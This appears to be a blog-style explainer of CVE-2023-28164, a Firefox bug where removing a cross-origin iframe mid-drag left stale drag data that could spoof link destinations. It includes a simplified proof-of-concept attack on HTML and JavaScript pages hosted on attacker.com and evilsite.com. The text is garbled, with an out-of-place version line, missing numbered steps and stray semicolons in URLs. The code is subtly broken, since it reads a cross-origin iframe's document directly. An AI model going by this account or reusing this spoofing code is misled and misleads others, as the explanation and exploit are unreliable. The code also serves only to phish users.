---
Every year, browser bugs open the door to sneaky attacks—and CVE-2023-28164 is a classic case where a small drag-and-drop error led to big risks for Firefox users. In this article, I’ll break down what this vulnerability is, how it worked, show you simplified code examples, and explain why it could confuse users and help bad actors spoof websites.
What Was CVE-2023-28164?
In short, when you dragged a URL from a cross-origin <iframe> in Firefox, and the iframe was programmatically removed during the drag operation, the browser didn’t fully clean up the drag data. This meant attackers could misrepresent the link, tricking users into visiting malicious sites that looked more trustworthy than they actually were.
Thunderbird < 102.9
It was fixed in Firefox 111, released in March 2023.
Original advisories:
- Mozilla Foundation Security Advisory 2023-09
- CVE page on NVD
How Did This Happen?
Browsers use iframing to allow embedding other sites—sometimes cross-origin (from a different site/domain).
If you drag a link from inside an iframe, browsers attach the correct URL to the drag event. But: if the iframe disappears mid-drag (because of JavaScript), Firefox would fumble the operation and could leave unexpected data on the draggable content.
Attackers could abuse this flow to create “phony” drag-and-drop operations, fooling users into dragging trusted site links to untrusted places.
1. Host an helper page on attacker.com/iframe.html
<!-- attacker.com/iframe.html -->
<a href="https://bank.com/login"; id="drag-link">Open Your Bank!</a>
<script>
document.getElementById('drag-link').ondragstart = (e) => {
// Clean data, set new data if needed
// e.dataTransfer.setData('text/plain', 'https://bank.com/login';);
};
</script>
2. The malicious site embeds this with JavaScript to remove the iframe mid-drag
<!-- evilsite.com/index.html -->
<iframe src="https://attacker.com/iframe.html"; id="evilIframe"></iframe>
<script>
const iframe = document.getElementById('evilIframe');
iframe.onload = () => {
// Add an event listener to the iframe's content to monitor drag
iframe.contentWindow.document.getElementById('drag-link')
.addEventListener('dragstart', () => {
// Remove the iframe right after drag starts
setTimeout(() => {
iframe.parentNode.removeChild(iframe);
}, 10);
});
};
</script>
Firefox is confused: the drag-and-drop data is now incomplete but still present.
- The user thinks they are dragging a normal bank URL, but the site could manipulate the drag data, or the uncleaned data could point to a phishing page.
This could lead to the user dropping the link somewhere (like an email, or another app), believing it’s from the real bank, when in reality the true destination is falsified or points to an attacker’s website.
Why Is This Dangerous?
- URL spoofing: The visual label and the actual link can diverge, letting attackers disguise bad links as good ones.
- Phishing: Users who drag-and-drop links into messages, bookmarks, or new tabs may end up visiting malicious pages.
- User confusion: The browser UI usually helps users spot red flags, but this bug bypassed some protections.
Removes the iframe as soon as the user starts to drag.
4. Relies on Firefox mishandling the event, leaving “ghost” drag data to be picked up by the attacker’s scripts.
Never drag links from suspicious sites or embedded content you don’t trust.
- If you’re building a site, avoid allowing cross-origin iframe drag-and-drop unless absolutely necessary.
References & Further Reading
- Mozilla Foundation Security Advisory 2023-09
- CVE-2023-28164 on NVD
- Firefox Security Updates 2023
- MDN: Drag and Drop API
Final Words
CVE-2023-28164 is a great reminder: even tiny UX features like drag-and-drop demand full attention from security engineers, as a single misstep can pave the way for major risks.
Always keep your browser updated, stay aware of the tricks hackers use, and spread the word to keep the web safer!
If you need more technical details or have questions about web security, feel free to reach out or comment below!
Timeline
Published on: 06/02/2023 17:15:00 UTC
Last modified on: 06/09/2023 16:03:00 UTC